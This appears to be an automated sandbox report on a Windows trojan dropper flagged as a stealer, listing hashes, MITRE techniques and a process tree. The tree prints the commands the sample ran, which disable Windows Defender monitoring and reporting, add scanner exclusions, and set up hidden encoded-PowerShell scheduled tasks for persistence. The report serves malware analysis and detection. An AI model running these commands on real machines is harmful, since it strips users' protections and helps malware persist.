aae089ffc7f6e35506106b454fd2edfc4941467e06f76d173f9cbd9e02110031

Analysis

max time kernel
145s
max time network
140s
platform
windows7_x64
resource
win7-20231025-en
resource tags

arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
submitted
07-12-2023 19:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

fca38988f95f893355d9f020a1f71ee3
SHA1

c3b9647467c9b434ba6a796c05f27a350c6fd8c8
SHA256

aae089ffc7f6e35506106b454fd2edfc4941467e06f76d173f9cbd9e02110031
SHA512

266566c7ec8057122c5ca08dc00c16c5c9e73ea552c4c3fbc5a41c56e2fb2852b8dbc1dd2161980609d750cc0d120f2d074445585cbe5bf33c6beb2ed5bfb36c
SSDEEP

196608:91OUHIbPGg9PaDD9zATbAXqXWAXz2v/tBDPRb7S:3OUIb+Iiwk6mPv/tVRq

Score

10^/10

evasion spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 40 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bJazgiTXFJUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\sUklQelueKqzsVVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bJazgiTXFJUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ycMZCyUlVfbU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yczsUHdtPuMxC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\sUklQelueKqzsVVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\szdKxxrFMiVXCdXj = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\icEyDogKU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yczsUHdtPuMxC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PhaWElAePoHhBdUTFeR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ycMZCyUlVfbU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\icEyDogKU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PhaWElAePoHhBdUTFeR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Executes dropped EXE 3 IoCs

Processes:

Install.exeInstall.exeDzWmOru.exe

pid process

1940 Install.exe
2328 Install.exe
1328 DzWmOru.exe
Loads dropped DLL 8 IoCs

Processes:

file.exeInstall.exeInstall.exe

pid process

2472 file.exe
1940 Install.exe
1940 Install.exe
1940 Install.exe
1940 Install.exe
2328 Install.exe
2328 Install.exe
2328 Install.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

pid	process
1940	Install.exe
2328	Install.exe
1328	DzWmOru.exe

pid	process
2472	file.exe
1940	Install.exe
1940	Install.exe
1940	Install.exe
1940	Install.exe
2328	Install.exe
2328	Install.exe
2328	Install.exe

Drops file in System32 directory 8 IoCs

Processes:

powershell.EXEpowershell.EXEInstall.exepowershell.EXEDzWmOru.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	DzWmOru.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	DzWmOru.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	DzWmOru.exe

Drops file in Windows directory 1 IoCs

Processes:

conhost.exe

description ioc process

File created C:\Windows\Tasks\bQrKcOXclPyMmQgfTY.job conhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1972 schtasks.exe
2208 schtasks.exe
1660 schtasks.exe
2308 schtasks.exe
1944 schtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bQrKcOXclPyMmQgfTY.job	conhost.exe

pid	process
1972	schtasks.exe
2208	schtasks.exe
1660	schtasks.exe
2308	schtasks.exe
1944	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 9 IoCs

Processes:

wscript.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

pid	process
2940	powershell.EXE
2940	powershell.EXE
2940	powershell.EXE
2096	powershell.EXE
2096	powershell.EXE
2096	powershell.EXE
1012	powershell.EXE
1012	powershell.EXE
1012	powershell.EXE
1640	powershell.EXE
1640	powershell.EXE
1640	powershell.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

description	pid	process
Token: SeDebugPrivilege	2940	powershell.EXE
Token: SeDebugPrivilege	2096	powershell.EXE
Token: SeDebugPrivilege	1012	powershell.EXE
Token: SeDebugPrivilege	1640	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exeInstall.exeInstall.exeforfiles.exereg.execmd.execmd.exe

description	pid	process	target process
PID 2472 wrote to memory of 1940	2472	file.exe	Install.exe
PID 2472 wrote to memory of 1940	2472	file.exe	Install.exe
PID 2472 wrote to memory of 1940	2472	file.exe	Install.exe
PID 2472 wrote to memory of 1940	2472	file.exe	Install.exe
PID 2472 wrote to memory of 1940	2472	file.exe	Install.exe
PID 2472 wrote to memory of 1940	2472	file.exe	Install.exe
PID 2472 wrote to memory of 1940	2472	file.exe	Install.exe
PID 1940 wrote to memory of 2328	1940	Install.exe	Install.exe
PID 1940 wrote to memory of 2328	1940	Install.exe	Install.exe
PID 1940 wrote to memory of 2328	1940	Install.exe	Install.exe
PID 1940 wrote to memory of 2328	1940	Install.exe	Install.exe
PID 1940 wrote to memory of 2328	1940	Install.exe	Install.exe
PID 1940 wrote to memory of 2328	1940	Install.exe	Install.exe
PID 1940 wrote to memory of 2328	1940	Install.exe	Install.exe
PID 2328 wrote to memory of 2960	2328	Install.exe	forfiles.exe
PID 2328 wrote to memory of 2960	2328	Install.exe	forfiles.exe
PID 2328 wrote to memory of 2960	2328	Install.exe	forfiles.exe
PID 2328 wrote to memory of 2960	2328	Install.exe	forfiles.exe
PID 2328 wrote to memory of 2960	2328	Install.exe	forfiles.exe
PID 2328 wrote to memory of 2960	2328	Install.exe	forfiles.exe
PID 2328 wrote to memory of 2960	2328	Install.exe	forfiles.exe
PID 2328 wrote to memory of 2776	2328	Install.exe	forfiles.exe
PID 2328 wrote to memory of 2776	2328	Install.exe	forfiles.exe
PID 2328 wrote to memory of 2776	2328	Install.exe	forfiles.exe
PID 2328 wrote to memory of 2776	2328	Install.exe	forfiles.exe
PID 2328 wrote to memory of 2776	2328	Install.exe	forfiles.exe
PID 2328 wrote to memory of 2776	2328	Install.exe	forfiles.exe
PID 2328 wrote to memory of 2776	2328	Install.exe	forfiles.exe
PID 2776 wrote to memory of 2640	2776	forfiles.exe	cmd.exe
PID 2776 wrote to memory of 2640	2776	forfiles.exe	cmd.exe
PID 2776 wrote to memory of 2640	2776	forfiles.exe	cmd.exe
PID 2776 wrote to memory of 2640	2776	forfiles.exe	cmd.exe
PID 2776 wrote to memory of 2640	2776	forfiles.exe	cmd.exe
PID 2776 wrote to memory of 2640	2776	forfiles.exe	cmd.exe
PID 2776 wrote to memory of 2640	2776	forfiles.exe	cmd.exe
PID 2960 wrote to memory of 2528	2960	reg.exe	cmd.exe
PID 2960 wrote to memory of 2528	2960	reg.exe	cmd.exe
PID 2960 wrote to memory of 2528	2960	reg.exe	cmd.exe
PID 2960 wrote to memory of 2528	2960	reg.exe	cmd.exe
PID 2960 wrote to memory of 2528	2960	reg.exe	cmd.exe
PID 2960 wrote to memory of 2528	2960	reg.exe	cmd.exe
PID 2960 wrote to memory of 2528	2960	reg.exe	cmd.exe
PID 2640 wrote to memory of 2544	2640	cmd.exe	reg.exe
PID 2640 wrote to memory of 2544	2640	cmd.exe	reg.exe
PID 2640 wrote to memory of 2544	2640	cmd.exe	reg.exe
PID 2640 wrote to memory of 2544	2640	cmd.exe	reg.exe
PID 2640 wrote to memory of 2544	2640	cmd.exe	reg.exe
PID 2640 wrote to memory of 2544	2640	cmd.exe	reg.exe
PID 2640 wrote to memory of 2544	2640	cmd.exe	reg.exe
PID 2528 wrote to memory of 2524	2528	cmd.exe	reg.exe
PID 2528 wrote to memory of 2524	2528	cmd.exe	reg.exe
PID 2528 wrote to memory of 2524	2528	cmd.exe	reg.exe
PID 2528 wrote to memory of 2524	2528	cmd.exe	reg.exe
PID 2528 wrote to memory of 2524	2528	cmd.exe	reg.exe
PID 2528 wrote to memory of 2524	2528	cmd.exe	reg.exe
PID 2528 wrote to memory of 2524	2528	cmd.exe	reg.exe
PID 2528 wrote to memory of 2560	2528	cmd.exe	reg.exe
PID 2528 wrote to memory of 2560	2528	cmd.exe	reg.exe
PID 2528 wrote to memory of 2560	2528	cmd.exe	reg.exe
PID 2528 wrote to memory of 2560	2528	cmd.exe	reg.exe
PID 2528 wrote to memory of 2560	2528	cmd.exe	reg.exe
PID 2528 wrote to memory of 2560	2528	cmd.exe	reg.exe
PID 2528 wrote to memory of 2560	2528	cmd.exe	reg.exe
PID 2640 wrote to memory of 2592	2640	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2472

C:\Users\Admin\AppData\Local\Temp\7zS3063.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1940

C:\Users\Admin\AppData\Local\Temp\7zS337F.tmp\Install.exe
.\Install.exe /bAdPdidLC "525403" /S
3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2328

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
PID:2960

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:2528

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:2560

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:2524

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:2776

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:2640

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:2544

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:2592

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gTzSIkRJV" /SC once /ST 10:35:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:1972

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gTzSIkRJV"
4⤵
PID:2876

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gTzSIkRJV"
4⤵
PID:2272

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bQrKcOXclPyMmQgfTY" /SC once /ST 19:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\DzWmOru.exe\" BX /MIsite_idEEz 525403 /S" /V1 /F
4⤵
- Creates scheduled task(s)
PID:2208

C:\Windows\system32\taskeng.exe
taskeng.exe {C59F5D66-4F4A-4761-9BF5-076C7891D40D} S-1-5-21-1861898231-3446828954-4278112889-1000:PTZSFKIF\Admin:Interactive:[1]
1⤵
PID:1952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2968

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2832

C:\Windows\system32\taskeng.exe
taskeng.exe {6DCD38A8-46D1-4E22-9A32-2D3B55ED72CA} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1964

C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\DzWmOru.exe
C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\DzWmOru.exe BX /MIsite_idEEz 525403 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1328

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gujyilwym" /SC once /ST 12:52:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1660

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gujyilwym"
3⤵
PID:2920

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gujyilwym"
3⤵
PID:2384

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:1604

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1624

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gNHXaQpcn" /SC once /ST 13:11:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:2308

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:1304

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gNHXaQpcn"
3⤵
PID:696

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gNHXaQpcn"
3⤵
PID:1608

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2232

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\szdKxxrFMiVXCdXj" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:820

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\szdKxxrFMiVXCdXj\RVlUOiQv\jeLVBvLoNRhGIpTH.wsf"
3⤵
PID:2552

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\szdKxxrFMiVXCdXj\RVlUOiQv\jeLVBvLoNRhGIpTH.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:2576

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2904

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
- Suspicious use of WriteProcessMemory
PID:2960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:64
